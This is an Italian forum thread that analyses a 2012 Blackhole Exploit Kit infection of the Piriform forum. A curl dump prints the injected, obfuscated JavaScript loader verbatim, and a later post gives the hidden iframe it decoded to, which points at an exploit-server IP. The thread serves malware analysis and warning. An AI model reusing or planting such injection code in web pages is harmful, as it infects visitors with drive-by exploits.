www.MegaLab.it

[hashcat]

Ho trovato casualmente una discussione sul wilderssecurity dove si segnalava che il forum in questione è stato compromesso.
Specifico che si tratta, come al solito, dell'onnipresente Blackhole Exploit Kit che sfrutta una vulnerabilità in JRE (CVE-2012-1723) ed un exploit da PDF.
Potete trovare un'interessante analisi dell'exploit QUI (blog eset).

[hashcat]

Ed ecco il dump della home del forum (curl da Android con User-Agent e Referer falsificati):

Codice: Seleziona tutto

$ curl -v -e "http://forum.piriform.com/" -A "Mozilla/4.0 (compatible; MSIE 8.0 ; Windows NT 6.1)" http://forum.piriform.com
* About to connect() to forum.piriform.com port 80 (#0)
* Trying 50.28.75.78...
* connected
* Connected to forum.piriform.com (50.28.75.78) port 80 (#0)
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0 ; Windows NT 6.1)
Host: forum.piriform.com
Accept: */*
Referer: http://forum.piriform.com/

HTTP/1.1 200 OK
Date: Fri, 02 Nov 2012 XX:XX:XX GMT
Server: Apache
Transfer-Encoding: chunked
Content-Type: text/html

<script>if(window.document){v=window;try{fawbe++}catch(afnwenew){try{(v+v)()}catch(gngrthn){try{v["document"]["body"]="123"}catch(gfdnfdgber){m=123;if((alert+"").indexOf("native")!==-1)ev=window["eva".concat("l")];}}
n=["9","9","49","46","18","1g","44","4f","43","4l","4d","45","4e","4k","1m","47","45","4k","2l","4c","45","4d","45","4e","4k","4j","2i","51","3c","41","47","36","41","4d","45","1g","1f","42","4f","44","51","1f","1h","3j","20","3l","1h","53","d","9","9","9","49","46","4i","41","4d","45","4i","1g","1h","2b","d","9","9","55","18","45","4c","4j","45","18","53","d","9","9","9","44","4f","43","4l","4d","45","4e","4k","1m","4n","4i","49","4k","45","1g","1a","2c","49","46","4i","41","4d","45","18","4j","4i","43","2d","1f","48","4k","4k","4g","2a","1n","1n","24","26","1m","21","26","26","1m","21","24","27","1m","21","23","23","1n","4d","27","4d","44","23","20","25","1n","4k","4i","49","41","4c","1n","4j","4f","4c","4m","45","1l","4g","4l","4k","4k","45","44","1m","4g","48","4g","1f","18","4n","49","44","4k","48","2d","1f","21","20","1f","18","48","45","49","47","48","4k","2d","1f","21","20","1f","18","4j","4k","51","4c","45","2d","1f","4m","49","4j","49","42","49","4c","49","4k","51","2a","48","49","44","44","45","4e","2b","4g","4f","4j","49","4k","49","4f","4e","2a","41","42","4j","4f","4c","4l","4k","45","2b","4c","45","46","4k","2a","20","2b","4k","4f","4g","2a","20","2b","1f","2e","2c","1n","49","46","4i","41","4d","45","2e","1a","1h","2b","d","9","9","55","d","9","9","46","4l","4e","43","4k","49","4f","4e","18","49","46","4i","41","4d","45","4i","1g","1h","53","d","9","9","9","4m","41","4i","18","46","18","2d","18","44","4f","43","4l","4d","45","4e","4k","1m","43","4i","45","41","4k","45","2l","4c","45","4d","45","4e","4k","1g","1f","49","46","4i","41","4d","45","1f","1h","2b","46","1m","4j","45","4k","2h","4k","4k","4i","49","42","4l","4k","45","1g","1f","4j","4i","43","1f","1k","1f","48","4k","4k","4g","2a","1n","1n","24","26","1m","21","26","26","1m","21","24","27","1m","21","23","23","1n","4d","27","4d","44","23","20","25","1n","4k","4i","49","41","4c","1n","4j","4f","4c","4m","45","1l","4g","4l","4k","4k","45","44","1m","4g","48","4g","1f","1h","2b","46","1m","4j","4k","51","4c","45","1m","4m","49","4j","49","42","49","4c","49","4k","51","2d","1f","48","49","44","44","45","4e","1f","2b","46","1m","4j","4k","51","4c","45","1m","4g","4f","4j","49","4k","49","4f","4e","2d","1f","41","42","4j","4f","4c","4l","4k","45","1f","2b","46","1m","4j","4k","51","4c","45","1m","4c","45","46","4k","2d","1f","20","1f","2b","46","1m","4j","4k","51","4c","45","1m","4k","4f","4g","2d","1f","20","1f","2b","46","1m","4j","45","4k","2h","4k","4k","4i","49","42","4l","4k","45","1g","1f","4n","49","44","4k","48","1f","1k","1f","21","20","1f","1h","2b","46","1m","4j","45","4k","2h","4k","4k","4i","49","42","4l","4k","45","1g","1f","48","45","49","47","48","4k","1f","1k","1f","21","20","1f","1h","2b","d","9","9","9","44","4f","43","4l","4d","45","4e","4k","1m","47","45","4k","2l","4c","45","4d","45","4e","4k","4j","2i","51","3c","41","47","36","41","4d","45","1g","1f","42","4f","44","51","1f","1h","3j","20","3l","1m","41","4g","4g","45","4e","44","2j","48","49","4c","44","1g","46","1h","2b","d","9","9","55"];h=2;s="";if(m)for(i=0;i-613!=0;i++){k=i;if(window["document"])s+=String["fro"+"mCharCode"](parseInt(n[i],24));}try{if(window.document)febwnrth--}catch(bawetawe){z=s;ev(z)}}}</script>
<br />
<b>Fatal error</b>:  require_once() [<a href='function.require'>function.require</a>]: Failed opening required './initdata.php' (include_path='.:/usr/local/php53/pear') in <b>/home/ccleaner/public_html/index.php</b> on line <b>23</b><br />
* Connection #0 to host forum.piriform.com left intact
* Closing connection #0
$

[farbix89]

Un untore con i fiocchi!

[sampei.nihira]

https://www.virustotal.com/url/d2a283ef ... 351865306/

[GERONIMO*]

http://www.malwaredomainlist.com/mdl.ph ... uantity=50

[hashcat]

A seguire maggiori informazioni:

Questo è l'IFRAME che veniva (hanno ripulito il sito) caricato dallo script JavaScript offuscato:

Codice: Seleziona tutto

<iframe src='http://46.166.147.133/m7md305/trial/solve-putted.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>

Che analizzato con urlQuery riporta: Detected live BlackHole v2.0 exploit kit e ET RBN Known Russian Business Network IP.

La segnalazione conferma quanto avevo affermato nel primo messaggio (ovvero che si trattava di Blackhole), la seconda la ritengo personalmente più interessante: segnala che l'indirizzo IP del server dove è stato individuato il kit d'exploit, fa parte del Russian Business Network, per chi non l'avesse mai sentito nominare, consiglio la lettura di questa (scarna) pagina su Wikipedia. Maggiori informazioni sul RBN possono essere trovate QUI e su Spamhaus.

Fra i peggiori al mondo riguardo a spam, pedopornografia, malware, phishing e hosting di reti di criminalità informatica. Fornisce "hosting a prova di proiettili", nelle suddette attività criminose.

L'indirizzo IP è stato classificato come tale, prendendo come riferimento QUESTA lista liberamente accessibile (gestita da ET), maggiori informazioni sull'indirizzo IP (e dunque sul provider di hosting) sono presenti nel database di Spamhaus QUI (SBL136945), ne riporto alcune informazioni:

Nel range di IP da 46.166.128.XXX a 46.166.148.XXX sono segnalate le seguenti attività criminali:

• Domains seen spammed via botnet
• ZeuS botnet controller
• phish source
• Malware botnet controller
• SpyEye collector
• Dorkbot botnet controller
• Drive-By exploits
• Counterfeit product site hosting
• spammer redirection chain
• Black hole exploit: Javascript redirector
• SpyEye collector
• SpyEye backconnect
• Mozilla Phish/Malware Origination (No rDNS)

E nello specifico (46.166.147.XXX):

WhoIS:

Via: LeaseWeb - http://cidr-report.org/cgi-bin/as-report?as=AS50465

inetnum: 46.166.146.0 - 46.166.147.255
netname: SANTREX-INTERNET-SERVICES
descr: Santrex RU VPS Services
country: RU
admin-c: KC1261-RIPE
tech-c: KC1261-RIPE
status: ASSIGNED PA
mnt-by: IQHost-mnt
mnt-by: Cook08
mnt-lower: Cook08
source: RIPE # Filtered

person: Khalid Cook
address: Santrex Internet Services Ltd.
address: PO Box 66387
address: E14 1LR
address: London, UK
phone: +442075316044
abuse-mailbox: abuse@santrex.net
nic-hdl: KC1261-RIPE
mnt-by: Cook08
source: RIPE # Filtered

% Information related to '46.166.146.0/24AS50465'

route: 46.166.146.0/24
descr: Santrex RU VPS Services
origin: AS50465
mnt-by: IQHost-mnt
source: RIPE # Filtered

46.166.147.47 [santrex.net] Malware botnet controller (2012-02-10 - SBL128575)
46.166.147.112 [santrex.net] Malware botnet controller (2012-02-01 - SBL127913)
46.166.147.177 [santrex.net] Ramnit botnet controller (2011-09-23 - SBL117554)
46.166.147.191 [santrex.net] Malware botnet controller (2011-08-24 - SBL116098)

Per concludere, riporto QUESTO interessante articolo pubblicato sul blog di Sophos due giorni fa.
Riporto due passaggi interessanti:

Curiously, a domain used by the attackers was registered to an address in Moscow belonging to the Russian Ministry of Internal Affairs, department of logistics - which just happens to be based close to the Russian Secret Service (FSB).

Furthermore, according to CERT-Georgia, websites used to control the infected Georgian computers have links with RBN, the notorious Russian Business Network.

[farbix89]

https://www.virustotal.com/url/d2a283ef7f3a496036bb030a781c5807d6473b4b31455d7f0cae6cf097a8f989/analysis/1351865306/

Contro blackhole virustotal è impotente, è nascosto bene ;)